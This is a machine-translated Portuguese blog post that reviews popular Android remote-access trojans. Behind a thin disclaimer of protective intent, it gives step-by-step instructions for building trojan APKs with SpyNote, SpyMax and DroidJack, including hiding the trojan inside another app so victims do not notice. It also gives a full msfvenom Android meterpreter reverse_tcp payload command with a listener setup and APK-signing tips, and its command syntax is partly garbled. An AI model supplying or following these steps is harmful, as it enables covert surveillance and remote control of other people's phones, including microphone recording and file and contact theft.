WWW.FLEPS.COM.BR

Pesquisa e análise dos backdoors mais populares no android

By admin at 2019-06-15 • 0 colecionador • 705 visualizações de página

Introdução

Para falar sobre algo e discutir isso confortavelmente, primeiro você precisa esclarecer seu cérebro sobre esse assunto de discussão. Isso, para começar, será sobre o RAT. 

O Google diz isso: ”RAT - abreviação em inglês. Trojan de acesso remoto, em tradução - “ferramenta de administração remota” ou “ferramenta de controle remoto” ou “Trojan de acesso remoto”. O termo se tornou popular entre administradores de sistemas e hackers ”. 

Vamos ver o que é RAT

RAT é uma abreviatura que é literalmente interpretada como a Ferramenta de Administração Remota. Em tradução literal significa - Utilitário para administração remota. Sob condições ideais, é o software, que é frequentemente apresentado no esquema “Cliente-Servidor”. E isso não é sobre o Dark Comet ou RATs de vírus similares, mas sobre a similaridade do Team Viewer. 

Mas desde que há uma oportunidade para controlar o dispositivo remotamente, os hackers não conseguiram dormir, e depois disso, o familiar e simples para a dor NJRAT, Cometa e afins apareceu. 

Existem muitas análises e revisões no RAT para Windows, porque existem muitas. Eu decidi escrever algo que ninguém escreveu para mim. Por exemplo, a análise dos programas mais populares para acesso remoto para Android. Disse e mostrado abaixo, não uma chamada à ação, pegue o aviso:

Por tradição, é minha responsabilidade incluir aqui o aviso de responsabilidade do autor, que de acordo com os julgamentos geralmente aceitos aliviará o autor da responsabilidade, entendendo que mesmo que as informações fornecidas sejam usadas para fins maliciosos e alguém sofra, então a culpa é apenas dos ombros do atacante, bem claro. Nenhuma negação e absurdo semelhante me salvará do tormento da consciência, porque ainda consegui preservar algumas qualidades morais. Estando engajado em escrever este artigo, fiquei comovido pelas boas intenções. Meu artigo não é uma instrução como hackear um par de três amigos de PC, não-ee! Isso é feito para que cada leitor resista e proteja a si mesmo e a seus dados pessoais de ações de um contingente não confiável de tais ações.

Portanto, considere os programas usados com mais frequência para criar softwares de vírus em seus telefones celulares, a saber:

  1. Spynote

  2. Spymax

  3. Droidjack

  4. Ahmoth

  5. Multihandler

E eles serão analisados e analisados de acordo com os seguintes critérios:

  • Um breve histórico de software:

  • Manual em uso:

  • Recursos e Desvantagens e Relatório VT

  • Formas de proteção e conclusões:

O primeiro da lista foi o SpyNote

  1. Nenhuma história de escrita e autores poderia ser encontrada, apenas instruções curtas para usar tais coisas, que dificilmente podem ser chamadas de prudentes. Não encontrei nada no Google de língua inglesa e em outros mecanismos de pesquisa. O autor especificamente confundiu e limpou seus rastros, ou eles foram removidos por outros usuários.

  2. Nós nos voltamos para um breve guia sobre o uso deste milagre. Testes foram realizados em meus dispositivos e ninguém, exceto meu cérebro e mente, ficou ferido. Então, tudo é clássico e equivalente a ações com o NJRAT, o princípio de seu trabalho é essencialmente o mesmo - configurar uma sessão através de um arquivo infectado para o seu cliente

Abra o nosso programa e vá para o separador “Bulid Client”, no qual definimos o ícone, o nome e a versão. Em seguida, vá para a seção "Endereço dinâmico", que é responsável pelo endereço do nosso dispositivo a partir do qual esse maravilhoso backdoor foi criado. Partindo do fato de que trabalharemos na rede local, não faz sentido registrar um ip dinâmico em recursos especiais para transformá-lo em um recurso estático. Tudo é padrão, digite o ip e a porta, depois clique no botão “add”. Isso conclui as configurações nessa guia. Vá para o próximo, onde você pode configurar os recursos do nosso vírus, com sua permissão eu vou chamar assim. Para alguns, os direitos do superusuário são necessários no dispositivo da vítima, depois que clicamos em "Construir" e esperamos alguns minutos. Então, vemos o APK na pasta raiz.


1556462292742-png.29167




Entre as principais funcionalidades, gostaria de mencionar recursos como:

  • A capacidade de gravar de um microfone.

  • Capacidade de abrir o shell linux

  • Gerenciador de arquivos e contatos.

  • Bem, e assim por diante.

3. Entre as deficiências, gostaria de destacar uma funcionalidade pequena e restrita em relação a outras aplicações. E, claro, a mesma alta taxa de detecção de assinaturas antivírus. Com base no julgamento de que não há vírus no Android e nenhum antivírus é necessário, a maioria dos dispositivos é vulnerável. Nos novos dispositivos, onde há um limitador de tráfego de fundo, a sessão não foi marcada pela estabilidade e depois de alguns minutos foi embora. 

4. Com os métodos de proteção, tudo está claro, este é um software primitivo de Tróia, que mostrou uma taxa de detecção na proporção de 24/60, razão pela qual antivírus comuns podem se defender contra esse lixo. 

Spymax

  1. Um pensamento se arrasta em que os autores do software anterior são os mesmos. O SpyMAX pode ser chamado de uma versão aprimorada, como o nome sugere. Existem algumas diferenças no trabalho, por exemplo, requisitos de instalação do Java. Não há informações detalhadas sobre o SpyMAX na Internet.

  2. Aqui tudo é simples e claro, até a criança conseguiu. Eu não excluo que as pessoas que não são educadas nesta área leiam isto, então eu assinarei tudo em detalhes. Para começar, abra nosso programa, clique em "Bluild" e, em seguida, prescreva nosso IP. Depois disso, você precisará de um pacote Java instalado. Na próxima seção, especifique o caminho para o diretório Bin na pasta Java. Então tudo está nos clássicos, expomos o nome, ícone e tipo de aplicação. Após alguns segundos, clique em OK, após o que uma aparência da linha de comando será aberta, o que refletirá o processo de criação de um aplicativo APK.


    screenshot_20-png.29157

  3. Tem uma funcionalidade impressionante, em comparação com o SpyNote. Algumas ações requerem direitos SuperUser e um pacote Java completo. A sessão não foi distinguida pela estabilidade, assim como em novas versões do Android, há um limitador de tráfego de fundo. A taxa de detecção foi 30/60, o que é mais do que o construtor anterior. Em alguns casos, você precisa de uma assinatura do arquivo APK, que já mencionei.

  4. O principal método de proteção é um bom antivírus com bancos de dados atuais.


    screenshot_22-png.29158

Droidjack

  1. Mais uma vez ... Não foi possível encontrar o autor, eu pessoalmente sei apenas que este software é um dos mais caros no mercado negro. O contato é Sankevee.

  2. Por tradição, abrimos nosso milagre e colocamos o porto para o trabalho. Passando para a guia Gerar, notamos a notificação de que o endereço IP não é adequado aqui e você precisa usar apenas o DNS dinâmico, o que eu realmente farei. Depois de exibir o nome e outras informações sobre o arquivo, clique na marca de seleção em frente ao rótulo Ocultar e há uma oportunidade de mesclar nosso vírus em um com alguns aplicativos. Quando ativado, o modo vítima não suspeitará que o malware foi instalado em seu dispositivo móvel.

  3. Entre as deficiências, note-se a presença das assinaturas desta aplicação nos bancos de dados de antivírus, caso contrário, não é ruim. A taxa de detecção foi de 23/60. Os pedidos são pagos e custam cerca de US $ 200 no mercado negro. Há também várias opções avançadas na janela Avançado.

  4. Atenção e meticulosidade adequadas irão ajudá-lo a encontrar tudo isso. Use o antivírus como ajuda.


    screenshot_23-png.29159

Ahmyht

Quando cheguei perto de testar Ahmyht, finalmente consegui sair da internet por um dia inteiro e, como resultado, decidi adiar a análise desta aplicação “para mais tarde”. 

Multihandler

  1. Esta é a façanha que você pode falar para sempre. Suas possibilidades são limitadas apenas pela nossa imaginação e, portanto, eu não poderia escrever sem atingir sua grande personalidade. No último artigo eu já toquei sobre a criação de uma carga útil para o Android, tudo isso é feito de forma muito simples e sem quaisquer armadilhas, mas existem nuances.

  2. Então, primeiro precisamos gerar nossa carga útil. Isto é feito pelo comando: 
    Code :: 
    msfvenom -p andriod / meterpreter / reverse_tcp lhost = 192.168.43.211 lport = 8888> /root/file.apk 
    Então, resta apenas configurar o listener para o ip e payload especificados.


    _-_-_- 2019-22-09-09-24-png.29160

Código: 
use exploit / multi / handler 
definir payload android / meterpreter / reverse_tcp 
definir lhost 192.168.43.211 
definir lport 8888 
explorar 
Depois de instalar o APK-shku no android, mas vemos o seguinte: "Erro de instalação". Pesquisando, encontrei soluções para esse método. A instalação não ocorre porque o aplicativo APK não possui uma assinatura, mas esse assunto está ao nosso alcance! Naturalmente, é possível assinar seus aplicativos usando ambientes populares de desenvolvimento de aplicativos, mas não gostei dessa opção e consegui pesquisar os aplicativos Zipsinger, que serão assinados em alguns cliques. Após a instalação, a sessão do meterpreter voa para nós.


_-_-_- 2019-03-22-09-10-26-png.29161




Conclusões globais

Não faz sentido atrasar e explicar detalhadamente as coisas já claras. As formas não são perfeitas e a proteção pode servir como uma cabeça brilhante e consciência. Instale antivírus. Vírus no android lá, não se esqueça disso. As aplicações na revisão são apresentadas para fins informativos. Vamos ser mais espertos do que golpistas e crianças em idade escolar. Boa sorte!



Requer login

Loading...
:79::65::p:78::57:;):77::51::D:76:
:2::icon_syria_lovely::o:75::1::):clap::71::(:70: